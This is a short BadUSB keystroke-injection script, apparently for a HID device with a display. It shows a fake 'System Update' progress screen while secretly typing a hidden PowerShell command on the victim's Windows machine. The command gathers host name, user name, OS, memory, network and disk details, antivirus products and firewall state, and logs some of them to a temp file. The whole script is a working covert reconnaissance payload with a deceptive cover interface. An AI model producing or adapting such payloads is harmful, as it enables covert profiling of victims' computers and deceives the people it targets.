REM ===============================================
REM 📊 PP_Tech Progress + Info Gathering - US 🇺🇸
REM Layout: US QWERTY (English)
REM Discrete exfiltration with progress bar
REM ===============================================

DELAY 2000
LED_OFF
DISPLAY_CLEAR

REM Convincing update interface
DISPLAY_TEXT 15 10 System Update
DISPLAY_TEXT 10 25 Incoflandres v3.1
DISPLAY_TEXT 25 40 Please wait...

LED 0 255 0 100
DELAY 1000

REM Progress: 25%
DISPLAY_TEXT 0 55 [######________] 25%
GUI r
DELAY 1000

REM Silent information gathering (US compatible)
STRING powershell -WindowStyle Hidden -Command "
DELAY 300
STRING $h=$env:COMPUTERNAME;
DELAY 200
STRING $u=$env:USERNAME;
DELAY 200
STRING $os=(gwmi Win32_OperatingSystem).Caption;
DELAY 200
STRING $ram=[math]::Round((gwmi Win32_ComputerSystem).TotalPhysicalMemory/1GB,1);
DELAY 300

REM Progress: 50%
DISPLAY_TEXT 0 55 [##########____] 50%
LED 255 255 0 150

STRING $net=gwmi Win32_NetworkAdapterConfiguration|?{$_.IPEnabled};
DELAY 300
STRING $disk=gwmi Win32_LogicalDisk|?{$_.DriveType -eq 3};
DELAY 300

REM Progress: 75%
DISPLAY_TEXT 0 55 [#############_] 75%

STRING $av=Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct -EA 0;
DELAY 300
STRING $fw=netsh advfirewall show allprofiles state 2>$null;
DELAY 300

REM Progress: 100%
DISPLAY_TEXT 0 55 [##############] 100%
LED 0 255 0 255

REM Discrete logging
STRING echo 'PP_Tech-Info:',$h,$u,$os,$ram'GB',(Get-Date)|Out-File $env:TEMP\sys.log;
DELAY 200
STRING exit"
ENTER

DELAY 5000

REM Discrete success
DISPLAY_CLEAR
DISPLAY_TEXT 25 30 Complete!
DISPLAY_TEXT 10 45 System updated
LED 0 255 0 100

DELAY 3000
DISPLAY_CLEAR
LED_OFF
RESET